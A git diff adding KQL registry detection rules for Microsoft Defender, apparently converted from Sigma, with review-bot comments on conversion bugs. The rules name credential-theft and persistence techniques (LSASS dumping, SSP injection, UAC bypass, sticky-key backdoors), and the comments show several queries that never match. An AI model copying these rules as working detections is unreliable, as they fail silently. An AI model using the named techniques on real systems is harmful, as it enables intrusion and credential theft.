@@ -0,0 +1,12 @@ +// Title: Atbroker Registry Change +// Author: Mateusz Wydra, oscd.community +// Date: 2020-10-13 +// Level: medium +// Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1218, attack.persistence, attack.t1547 +// False Positives: +// - Creation of non-default, legitimate at usage + +DeviceRegistryEvents +| where (RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs" or RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") and (not(((RegistryValueData =~ "(Empty)" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\atbroker.exe" and RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Configuration") or (InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" and RegistryKey contains "Software\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs")))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_event/cmstp_execution_registry_event.kql b/KQL/rules/windows/registry/registry_event/cmstp_execution_registry_event.kql new file mode 100644 index 00000000..a8ef67ad --- /dev/null +++ b/KQL/rules/windows/registry/registry_event/cmstp_execution_registry_event.kql @@ -0,0 +1,12 @@ +// Title: CMSTP Execution Registry Event +// Author: Nik Seetharaman +// Date: 2018-07-16 +// Level: high +// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001 +// False Positives: +// - Legitimate CMSTP use (unlikely in modern enterprise environments) + +DeviceRegistryEvents +| where RegistryKey contains "\\cmmgr32.exe" \ No newline at end of file 
diff --git a/KQL/rules/windows/registry/registry_event/creation_of_a_local_hidden_user_account_by_registry.kql b/KQL/rules/windows/registry/registry_event/creation_of_a_local_hidden_user_account_by_registry.kql new file mode 100644 index 00000000..5911f687 --- /dev/null +++ b/KQL/rules/windows/registry/registry_event/creation_of_a_local_hidden_user_account_by_registry.kql @@ -0,0 +1,10 @@ +// Title: Creation of a Local Hidden User Account by Registry +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-05-03 +// Level: high +// Description: Sysmon registry detection of a local hidden user account. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1136.001 + +DeviceRegistryEvents +| where InitiatingProcessFolderPath endswith "\\lsass.exe" and RegistryKey endswith "\\SAM\\SAM\\Domains\\Account\\Users\\Names*" and RegistryKey endswith "$\\(Default)" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_event/dll_load_via_lsass.kql b/KQL/rules/windows/registry/registry_event/dll_load_via_lsass.kql new file mode 100644 index 00000000..01fa09f5 --- /dev/null +++ b/KQL/rules/windows/registry/registry_event/dll_load_via_lsass.kql @@ -0,0 +1,10 @@ +// Title: DLL Load via LSASS +// Author: Florian Roth (Nextron Systems) +// Date: 2019-10-16 +// Level: high +// Description: Detects a method to load DLL via LSASS process using an undocumented Registry key +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.execution, attack.persistence, attack.t1547.008 + +DeviceRegistryEvents +| where (RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt" or RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt") and (not(((RegistryValueData in~ ("%%systemroot%%\\system32\\ntdsa.dll", "%%systemroot%%\\system32\\lsadb.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe"))) \ No newline at end of file 
diff --git a/KQL/rules/windows/registry/registry_event/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql b/KQL/rules/windows/registry/registry_event/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql new file mode 100644 index 00000000..5dfcfa6a --- /dev/null +++ b/KQL/rules/windows/registry/registry_event/enable_remote_connection_between_anonymous_computer_allowanonymouscallback.kql @@ -0,0 +1,12 @@ +// Title: Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback +// Author: X__Junior (Nextron Systems) +// Date: 2023-11-03 +// Level: medium +// Description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Administrative activity + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\WBEM\\CIMOM\\AllowAnonymousCallback" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_event/esentutl_volume_shadow_copy_service_keys.kql b/KQL/rules/windows/registry/registry_event/esentutl_volume_shadow_copy_service_keys.kql new file mode 100644 index 00000000..46e5d83f --- /dev/null +++ b/KQL/rules/windows/registry/registry_event/esentutl_volume_shadow_copy_service_keys.kql 
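Review bot: `RegistryValueData =~ "DWORD (0x00000001)"` is the Sysmon rendering of a DWORD value (type name plus hex); DeviceRegistryEvents carries the value and its type in separate columns (`RegistryValueData`, `RegistryValueType`), so unless ingestion reproduces that rendering this exact comparison never fires — confirm against a sample row before relying on the rule. If the numeric value is stored as a plain string the predicate should become `RegistryValueData == "1"`, with `RegistryValueType` available for the type check. The same `DWORD (0x...)` literals drive the `lmcompatibilitylevel` and `NtlmMinClientSec` branches of the NetNTLM Downgrade Attack hunk, and the `%%systemroot%%` strings in the DLL Load via LSASS filter look like the same source-specific rendering carried over unchanged.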
@@ -0,0 +1,10 @@ +// Title: Esentutl Volume Shadow Copy Service Keys +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-10-20 +// Level: high +// Description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002 + +DeviceRegistryEvents +| where (InitiatingProcessFolderPath endswith "esentutl.exe" and RegistryKey contains "System\\CurrentControlSet\\Services\\VSS") and (not(RegistryKey contains "System\\CurrentControlSet\\Services\\VSS\\Start")) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_event/hybridconnectionmanager_service_installation_registry.kql b/KQL/rules/windows/registry/registry_event/hybridconnectionmanager_service_installation_registry.kql new file mode 100644 index 00000000..1d45be71 --- /dev/null +++ b/KQL/rules/windows/registry/registry_event/hybridconnectionmanager_service_installation_registry.kql @@ -0,0 +1,10 @@ +// Title: HybridConnectionManager Service Installation - Registry +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2021-04-12 +// Level: high +// Description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function. +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1608 + +DeviceRegistryEvents +| where RegistryKey contains "\\Services\\HybridConnectionManager" or (RegistryValueData contains "Microsoft.HybridConnectionManager.Listener.exe" and ActionType =~ "RegistryValueSet") \ No newline at end of file 
diff --git a/KQL/rules/windows/registry/registry_event/narrator_s_feedback_hub_persistence.kql b/KQL/rules/windows/registry/registry_event/narrator_s_feedback_hub_persistence.kql new file mode 100644 index 00000000..1b8071db --- /dev/null +++ b/KQL/rules/windows/registry/registry_event/narrator_s_feedback_hub_persistence.kql @@ -0,0 +1,10 @@ +// Title: Narrator's Feedback-Hub Persistence +// Author: Dmitriy Lifanov, oscd.community +// Date: 2019-10-25 +// Level: high +// Description: Detects abusing Windows 10 Narrator's Feedback-Hub +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001 + +DeviceRegistryEvents +| where (ActionType =~ "DeleteValue" and RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\DelegateExecute") or RegistryKey endswith "\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\Shell\\open\\command\\(Default)" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_event/netntlm_downgrade_attack_registry.kql b/KQL/rules/windows/registry/registry_event/netntlm_downgrade_attack_registry.kql new file mode 100644 index 00000000..ea1a67da --- /dev/null +++ b/KQL/rules/windows/registry/registry_event/netntlm_downgrade_attack_registry.kql 
@@ -0,0 +1,12 @@ +// Title: NetNTLM Downgrade Attack - Registry +// Author: Florian Roth (Nextron Systems), wagga, Nasreddine Bencherchali (Splunk STRT) +// Date: 2018-03-20 +// Level: high +// Description: Detects NetNTLM downgrade attack +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1562.001, attack.t1112 +// False Positives: +// - Services or tools that set the values to more restrictive values + +DeviceRegistryEvents +| where (RegistryKey endswith "SYSTEM*" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Control\\Lsa") and (((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\lmcompatibilitylevel") or ((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000010)", "DWORD (0x00000020)", "DWORD (0x00000030)")) and RegistryKey endswith "\\NtlmMinClientSec") or RegistryKey endswith "\\RestrictSendingNTLMTraffic") \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_event/new_portproxy_registry_entry_added.kql b/KQL/rules/windows/registry/registry_event/new_portproxy_registry_entry_added.kql new file mode 100644 index 00000000..0827a45a --- /dev/null +++ b/KQL/rules/windows/registry/registry_event/new_portproxy_registry_entry_added.kql 
@@ -0,0 +1,13 @@ +// Title: New PortProxy Registry Entry Added +// Author: Andreas Hunkeler (@Karneades) +// Date: 2021-06-22 +// Level: medium +// Description: Detects the modification of the PortProxy registry key which is used for port forwarding. +// MITRE Tactic: Lateral Movement +// Tags: attack.lateral-movement, attack.defense-evasion, attack.command-and-control, attack.t1090 +// False Positives: +// - WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723) +// - Synergy Software KVM (https://symless.com/synergy) + +DeviceRegistryEvents +| where RegistryKey endswith "\\Services\\PortProxy\\v4tov4\\tcp*" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_event/office_application_startup_office_test.kql b/KQL/rules/windows/registry/registry_event/office_application_startup_office_test.kql new file mode 100644 index 00000000..bc1e9378 --- /dev/null +++ b/KQL/rules/windows/registry/registry_event/office_application_startup_office_test.kql @@ -0,0 +1,12 @@ +// Title: Office Application Startup - Office Test +// Author: omkar72 +// Date: 2020-10-25 +// Level: medium +// Description: Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137.002 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey contains "\\Software\\Microsoft\\Office test\\Special\\Perf" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_event/path_to_screensaver_binary_modified.kql b/KQL/rules/windows/registry/registry_event/path_to_screensaver_binary_modified.kql new file mode 100644 index 00000000..0bfb3ba5 --- /dev/null +++ b/KQL/rules/windows/registry/registry_event/path_to_screensaver_binary_modified.kql 
@@ -0,0 +1,12 @@ +// Title: Path To Screensaver Binary Modified +// Author: Bartlomiej Czyz @bczyz1, oscd.community +// Date: 2020-10-11 +// Level: medium +// Description: Detects value modification of registry key containing path to binary used as screensaver. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.002 +// False Positives: +// - Legitimate modification of screensaver + +DeviceRegistryEvents +| where RegistryKey endswith "\\Control Panel\\Desktop\\SCRNSAVE.EXE" and (not((InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe"))) \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_event/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql b/KQL/rules/windows/registry/registry_event/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql new file mode 100644 index 00000000..df0567dc --- /dev/null +++ b/KQL/rules/windows/registry/registry_event/potential_credential_dumping_via_lsass_silentprocessexit_technique.kql @@ -0,0 +1,12 @@ +// Title: Potential Credential Dumping Via LSASS SilentProcessExit Technique +// Author: Florian Roth (Nextron Systems) +// Date: 2021-02-26 +// Level: critical +// Description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey contains "Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_event/potential_qakbot_registry_activity.kql b/KQL/rules/windows/registry/registry_event/potential_qakbot_registry_activity.kql new file mode 100644 index 00000000..225ea1f1 --- /dev/null 
+++ b/KQL/rules/windows/registry/registry_event/potential_qakbot_registry_activity.kql @@ -0,0 +1,10 @@ +// Title: Potential Qakbot Registry Activity +// Author: Hieu Tran +// Date: 2023-03-13 +// Level: high +// Description: Detects a registry key used by IceID in a campaign that distributes malicious OneNote files +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where RegistryKey endswith "\\Software\\firm\\soft\\Name" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_event/redmimicry_winnti_playbook_registry_manipulation.kql b/KQL/rules/windows/registry/registry_event/redmimicry_winnti_playbook_registry_manipulation.kql new file mode 100644 index 00000000..44c1247a --- /dev/null +++ b/KQL/rules/windows/registry/registry_event/redmimicry_winnti_playbook_registry_manipulation.kql @@ -0,0 +1,10 @@ +// Title: RedMimicry Winnti Playbook Registry Manipulation +// Author: Alexander Rausch +// Date: 2020-06-24 +// Level: high +// Description: Detects actions caused by the RedMimicry Winnti playbook +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where RegistryKey contains "HKLM\\SOFTWARE\\Microsoft\\HTMLHelp\\data" \ No newline at end of file diff --git a/KQL/rules/windows/registry/registry_event/registry_entries_for_azorult_malware.kql b/KQL/rules/windows/registry/registry_event/registry_entries_for_azorult_malware.kql new file mode 100644 index 00000000..d3ba1b1c --- /dev/null +++ b/KQL/rules/windows/registry/registry_event/registry_entries_for_azorult_malware.kql 
@@ -0,0 +1,10 @@
+// Title: Registry Entries For Azorult Malware
+// Author: Trent Liffick
+// Date: 2020-05-08
+// Level: critical
+// Description: Detects the presence of a registry key created during Azorult execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.execution, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "SYSTEM*" and RegistryKey endswith "\\services\\localNETService"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/registry_tampering_by_potentially_suspicious_processes.kql b/KQL/rules/windows/registry/registry_event/registry_tampering_by_potentially_suspicious_processes.kql
new file mode 100644
index 00000000..fb18677c
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/registry_tampering_by_potentially_suspicious_processes.kql
@@ -0,0 +1,14 @@
+// Title: Registry Tampering by Potentially Suspicious Processes
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-08-13
+// Level: medium
+// Description: Detects suspicious registry modifications made by suspicious processes such as script engine processes such as WScript, or CScript etc.
+// These processes are rarely used for legitimate registry modifications, and their activity may indicate an attempt to modify the registry
+// without using standard tools like regedit.exe or reg.exe, potentially for evasion and persistence.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.execution, attack.t1112, attack.t1059.005
+// False Positives:
+// - Some legitimate admin or install scripts may use these processes for registry modifications.
+
+DeviceRegistryEvents
+| where InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe"
\ No newline at end of file
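Review bot: `RegistryKey endswith "SYSTEM*" and RegistryKey endswith "\\services\\localNETService"` can never be true: the `*` from the Sigma pattern has been copied into the KQL literal, where `endswith` treats it as a literal asterisk, and two `endswith` clauses on the same column are only jointly satisfiable when one suffix ends with the other. The Sigma wildcard presumably meant "SYSTEM, then anything, ending in \services\localNETService", which the converter could express as `RegistryKey contains "SYSTEM" and RegistryKey endswith "\\services\\localNETService"` (a slightly wider but case-insensitive match). The same unescaped-`*` carry-over makes the key test silent in Suspicious Camera and Microphone Access (`ConsentStore*`), Windows Defender Threat Severity Default Action Modified (`ThreatSeverityDefaultAction*`), Add Port Monitor Persistence in Registry (`Monitors*`, `Environments*`, `Drivers*`), Change the Fax Dll (`Device Providers*`), Change Winevt Channel Access Permission Via Registry (`Channels*`), Classes Autorun Keys Modification (`ContextMenuHandlers*` inside an exclusion, so that exclusion silently stops applying) and ClickOnce Trust Prompt Tampering (`PromptingLevel*`). A converter-level fix (wildcard-in-middle → `contains` + `endswith`, or `matches regex`) plus a lint step that fails the workflow on any `*` inside an `endswith`/`startswith`/`=~` literal would catch this class before the PR is opened.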
diff --git a/KQL/rules/windows/registry/registry_event/run_once_task_configuration_in_registry.kql b/KQL/rules/windows/registry/registry_event/run_once_task_configuration_in_registry.kql
new file mode 100644
index 00000000..157fc1b0
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/run_once_task_configuration_in_registry.kql
@@ -0,0 +1,12 @@
+// Title: Run Once Task Configuration in Registry
+// Author: Avneet Singh @v3t0_, oscd.community
+// Date: 2020-11-15
+// Level: medium
+// Description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Legitimate modification of the registry key by legitimate program
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\Microsoft\\Active Setup\\Installed Components" and RegistryKey endswith "\\StubPath") and (not(((RegistryValueData contains "C:\\Program Files\\Google\\Chrome\\Application\\" and RegistryValueData contains "\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level") or ((RegistryValueData contains "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\" or RegistryValueData contains "C:\\Program Files\\Microsoft\\Edge\\Application\\") and RegistryValueData endswith "\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/security_support_provider_ssp_added_to_lsa_configuration.kql b/KQL/rules/windows/registry/registry_event/security_support_provider_ssp_added_to_lsa_configuration.kql
new file mode 100644
index 00000000..46cb2c04
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/security_support_provider_ssp_added_to_lsa_configuration.kql
@@ -0,0 +1,10 @@
+// Title: Security Support Provider (SSP) Added to LSA Configuration
+// Author: iwillkeepwatch
+// Date: 2019-01-18
+// Level: high
+// Description: Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.005
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Control\\Lsa\\Security Packages" or RegistryKey endswith "\\Control\\Lsa\\OSConfig\\Security Packages") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\syswow64\\MsiExec.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/shell_open_registry_keys_manipulation.kql b/KQL/rules/windows/registry/registry_event/shell_open_registry_keys_manipulation.kql
new file mode 100644
index 00000000..24917ebc
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/shell_open_registry_keys_manipulation.kql
@@ -0,0 +1,10 @@
+// Title: Shell Open Registry Keys Manipulation
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-08-30
+// Level: high
+// Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1546.001
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "\\Software\\Classes\\{" and ActionType =~ "RegistryValueSet" and RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\SymbolicLinkValue") or RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" or ((ActionType =~ "RegistryValueSet" and (RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\(Default)" or RegistryKey endswith "Classes\\exefile\\shell\\open\\command\\(Default)")) and (not(RegistryValueData =~ "(Empty)")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/sticky_key_like_backdoor_usage_registry.kql b/KQL/rules/windows/registry/registry_event/sticky_key_like_backdoor_usage_registry.kql
new file mode 100644
index 00000000..a1f334e0
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/sticky_key_like_backdoor_usage_registry.kql
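Review bot: The `\\(Default)` suffix on `RegistryKey` and the `RegistryValueData =~ "(Empty)"` test are Sysmon conventions (the `TargetObject` and `Details` formatting of Event ID 12/13) that, as far as I know, Defender's DeviceRegistryEvents does not use: the default value is an empty `RegistryValueName` rather than a `(Default)` suffix on the key, and an empty value is an empty or null `RegistryValueData`, so the `(Default)` branch here is unlikely to ever match and the `not(... "(Empty)")` exclusion becomes a no-op. The same carry-over appears in Bypass UAC Using DelegateExecute and Bypass UAC Using Event Viewer, in Classes Autorun Keys Modification, and in the `DWORD (0x00000001)`/`DWORD (0x00000006)` literals of Windows Defender Threat Severity Default Action Modified, Activate Suppression of Windows Security Center Notifications, Add DisallowRun Execution to Registry, Allow RDP Remote Assistance Feature and Antivirus Filter Driver Disallowed On Dev Drive, where MDE reports DWORD data as a plain number with the type in `RegistryValueType`. The converter should translate these `Details` literals into the MDE representation, e.g. `RegistryValueName == "" and RegistryKey endswith "Classes\\exefile\\shell\\open\\command"`, `isempty(RegistryValueData)`, and `toint(RegistryValueData) == 1`; please run the converted queries against a tenant with known-good test events before merging, since the rules as written fail closed (no alerts) rather than loudly.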
@@ -0,0 +1,12 @@
+// Title: Sticky Key Like Backdoor Usage - Registry
+// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
+// Date: 2018-03-15
+// Level: critical
+// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/suspicious_camera_and_microphone_access.kql b/KQL/rules/windows/registry/registry_event/suspicious_camera_and_microphone_access.kql
new file mode 100644
index 00000000..4cce5079
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/suspicious_camera_and_microphone_access.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Camera and Microphone Access
+// Author: Den Iuzvyk
+// Date: 2020-06-07
+// Level: high
+// Description: Detects Processes accessing the camera and microphone from suspicious folder
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1125, attack.t1123
+// False Positives:
+// - Unlikely, there could be conferencing software running from a Temp folder accessing the devices
+
+DeviceRegistryEvents
+| where (RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore*" and RegistryKey contains "\\NonPackaged") and (RegistryKey contains "microphone" or RegistryKey contains "webcam") and (RegistryKey contains ":#Windows#Temp#" or RegistryKey contains ":#$Recycle.bin#" or RegistryKey contains ":#Temp#" or RegistryKey contains ":#Users#Public#" or RegistryKey contains ":#Users#Default#" or RegistryKey contains ":#Users#Desktop#")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/suspicious_run_key_from_download.kql b/KQL/rules/windows/registry/registry_event/suspicious_run_key_from_download.kql
new file mode 100644
index 00000000..143e8011
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/suspicious_run_key_from_download.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Run Key from Download
+// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poude (Nextron Systems)
+// Date: 2019-10-01
+// Level: high
+// Description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+// - Software installers downloaded and used by users
+
+DeviceRegistryEvents
+| where (InitiatingProcessFolderPath contains "\\AppData\\Local\\Packages\\Microsoft.Outlook_" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\Olk\\Attachments\\" or InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Temporary Internet Files\\Content.Outlook\\" or InitiatingProcessFolderPath contains "\\Local Settings\\Temporary Internet Files\\") and (RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run" or RegistryKey contains "\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/uac_bypass_via_wsreset.kql b/KQL/rules/windows/registry/registry_event/uac_bypass_via_wsreset.kql
new file mode 100644
index 00000000..0d445fd2
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/uac_bypass_via_wsreset.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Via Wsreset
+// Author: oscd.community, Dmitry Uchakin
+// Date: 2020-10-07
+// Level: high
+// Description: Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/wdigest_credguard_registry_modification.kql b/KQL/rules/windows/registry/registry_event/wdigest_credguard_registry_modification.kql
new file mode 100644
index 00000000..1ad5897e
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/wdigest_credguard_registry_modification.kql
@@ -0,0 +1,12 @@
+// Title: Wdigest CredGuard Registry Modification
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2019-08-25
+// Level: high
+// Description: Detects potential malicious modification of the property value of IsCredGuardEnabled from
+// HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system.
+// This is usually used with UseLogonCredential to manipulate the caching credentials.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\IsCredGuardEnabled"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/windows_credential_editor_registry.kql b/KQL/rules/windows/registry/registry_event/windows_credential_editor_registry.kql
new file mode 100644
index 00000000..40b58969
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/windows_credential_editor_registry.kql
@@ -0,0 +1,10 @@
+// Title: Windows Credential Editor Registry
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-12-31
+// Level: critical
+// Description: Detects the use of Windows Credential Editor (WCE)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001, attack.s0005
+
+DeviceRegistryEvents
+| where RegistryKey contains "Services\\WCESERVICE\\Start"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_event/windows_defender_threat_severity_default_action_modified.kql b/KQL/rules/windows/registry/registry_event/windows_defender_threat_severity_default_action_modified.kql
new file mode 100644
index 00000000..1496fade
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_event/windows_defender_threat_severity_default_action_modified.kql
@@ -0,0 +1,15 @@
+// Title: Windows Defender Threat Severity Default Action Modified
+// Author: Matt Anderson (Huntress)
+// Date: 2025-07-11
+// Level: high
+// Description: Detects modifications or creations of Windows Defender's default threat action settings based on severity to 'allow' or take 'no action'.
+// This is a highly suspicious configuration change that effectively disables Defender's ability to automatically mitigate threats of a certain severity level,
+// allowing malicious software to run unimpeded. An attacker might use this technique to bypass defenses before executing payloads.
+// MITRE Tactic: Defense Evasion
